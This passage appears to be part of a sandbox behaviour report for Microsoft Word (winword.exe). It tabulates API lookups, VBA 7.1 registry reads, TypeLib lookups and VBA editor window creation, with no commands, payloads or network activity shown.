| Module | Get Address | module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x7feffdda0c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x7feffe12160 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x7feffda5af0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x7feffda5a90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x7feffda5a60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7feffda5a30 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7feffd860b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7feffd83e90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x7feffdd9f80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormat, address_out = 0x7feffe09b20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x7feffe09aa0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatNumber, address_out = 0x7feffe09990 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatPercent, address_out = 0x7feffe09890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x7feffe09770 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarWeekdayName, address_out = 0x7feffdeb8d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMonthName, address_out = 0x7feffdeb800 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAdd, address_out = 0x7feffe048e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAnd, address_out = 0x7feffe09470 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCat, address_out = 0x7feffe096a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDiv, address_out = 0x7feffe02fe0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarEqv, address_out = 0x7feffe09cf0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarIdiv, address_out = 0x7feffe08ff0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarImp, address_out = 0x7feffe09c00 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMod, address_out = 0x7feffe08e60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMul, address_out = 0x7feffe03690 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarOr, address_out = 0x7feffe092d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarPow, address_out = 0x7feffe02e80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarSub, address_out = 0x7feffe03f90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarXor, address_out = 0x7feffe091a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAbs, address_out = 0x7feffde7c30 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFix, address_out = 0x7feffde7a60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarInt, address_out = 0x7feffde7890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNeg, address_out = 0x7feffde7ea0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNot, address_out = 0x7feffe09600 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarRound, address_out = 0x7feffde76a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCmp, address_out = 0x7feffe083f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecAdd, address_out = 0x7feffdb3070 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecCmp, address_out = 0x7feffdbd700 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarBstrCat, address_out = 0x7feffdbd890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCyMulI4, address_out = 0x7feffd9caf0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7feffda8a00 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-12-06 22:26:32 (Local Time) |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = RequireDeclaration, data = 72, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Module | Get Address | module_name = Unknown module name, address_out = 0x7fee3a5fcd0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, address_out = 0x0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win64, data = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0\win64, data = C:\Windows\system32\FM20.DLL |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-12-06 22:26:32 (Local Time) |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\DesignerFeatures |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32, value_name = ThreadingModel, data = 65 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\Instance CLSID, data = {C62A69F0-16DC-11CE-9E98-00AA00574A4F} |
|
1 | |
| System | Get Cursor | x_out = 1018, y_out = 358 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-12-06 22:26:32 (Local Time) |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-12-06 22:26:32 (Local Time) |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| System | Get Cursor | x_out = 1018, y_out = 358 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-12-06 22:26:32 (Local Time) |
|
7 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\Typelib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\Typelib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\Typelib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\Typelib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = VbaCapability, data = 24 |
|
1 | |
| Module | Load | module_name = COMCTL32.DLL, base_address = 0x7fefc690000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = ImageList_Destroy, address_out = 0x7fefc6f07a4 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = ImageList_GetIconSize, address_out = 0x7fefc6f1010 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = InitCommonControls, address_out = 0x7fefc7c8b5c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = ImageList_LoadImageA, address_out = 0x7fefc6f01a8 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = ImageList_Create, address_out = 0x7fefc6f00fc |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = ImageList_SetOverlayImage, address_out = 0x7fefc6f0a70 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = ImageList_AddMasked, address_out = 0x7fefc6f0b60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = ImageList_GetImageInfo, address_out = 0x7fefc6f1180 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = ImageList_Draw, address_out = 0x7fefc6f0cd8 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = ImageList_DrawEx, address_out = 0x7fefc6f0bdc |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = PropertySheetA, address_out = 0x7fefc6d5c64 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = DestroyPropertySheetPage, address_out = 0x7fefc6cf018 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = CreatePropertySheetPageA, address_out = 0x7fefc6cfce8 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = MdiMaximized, data = 48 |
|
1 | |
| Window | Create | window_name = Microsoft Visual Basic for Applications, wndproc_parameter = 0 |
|
1 | |
| Window | Create | class_name = mdiclient, wndproc_parameter = 1597392 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = GridWidth, data = 112 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = GridHeight, data = 112 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = ShowGrid, data = 112 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = AlignToGrid, data = 112 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = SaveBeforeRun, data = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = ShowToolTips, data = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CollapseWindows, data = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = UpgradeVBX, data = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = ReadOnlyMode, data = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackgroundProjectLoad, data = 0 |
|
1 | |
| Window | Create | wndproc_parameter = 0 |
|
1 | |
| Window | Create | class_name = SysTreeView32, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = VbaCapability, data = 1 |
|
1 | |
| COM | Create | interface = 6E26E776-04F0-495D-80E4-3330352E3169, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = FolderView, data = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = Tool, type = REG_NONE |
|
1 | |
| Window | Create | class_name = ToolsPalette, wndproc_parameter = 0 |
|
1 | |
| Window | Create | window_name = Properties, wndproc_parameter = 0 |
|
1 | |
| Window | Create | window_name = Properties, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = PropertiesWindow, data = 4 |
|
1 | |
| Window | Create | window_name = Properties, class_name = ComboBox, wndproc_parameter = 0 |
|
1 | |
| Window | Create | window_name = Properties, class_name = SysTabControl32, wndproc_parameter = 0 |
|
1 | |
| Window | Create | window_name = Properties, class_name = ListBox, wndproc_parameter = 0 |
|
1 | |
| Window | Create | window_name = Properties, class_name = Button, wndproc_parameter = 0 |
|
1 | |
| Window | Create | window_name = Properties, class_name = Edit, wndproc_parameter = 0 |
|
1 | |
| Window | Create | window_name = Properties, class_name = ListBox, wndproc_parameter = 0 |
|
1 | |
| Window | Set Attribute | window_name = Properties, class_name = ListBox, index = 18446744073709551604, new_long = 0 |
|
1 | |
| Window | Set Attribute | window_name = Properties, class_name = ListBox, index = 18446744073709551600, new_long = 18446744071637565443 |
|
1 | |
| COM | Create | interface = 6E26E776-04F0-495D-80E4-3330352E3169, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = UI, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = Dock, type = REG_NONE |
|
1 | |
| Window | Create | wndproc_parameter = 0 |
|
1 | |
| Window | Create | wndproc_parameter = 0 |
|
1 | |
| Window | Create | wndproc_parameter = 0 |
|
1 | |
| Window | Create | wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\VBE\6.0\Addins64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\Designers |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\ToolboxControls |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CtlsShowSelected, data = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = DsnShowSelected, data = 0 |
|
1 | |
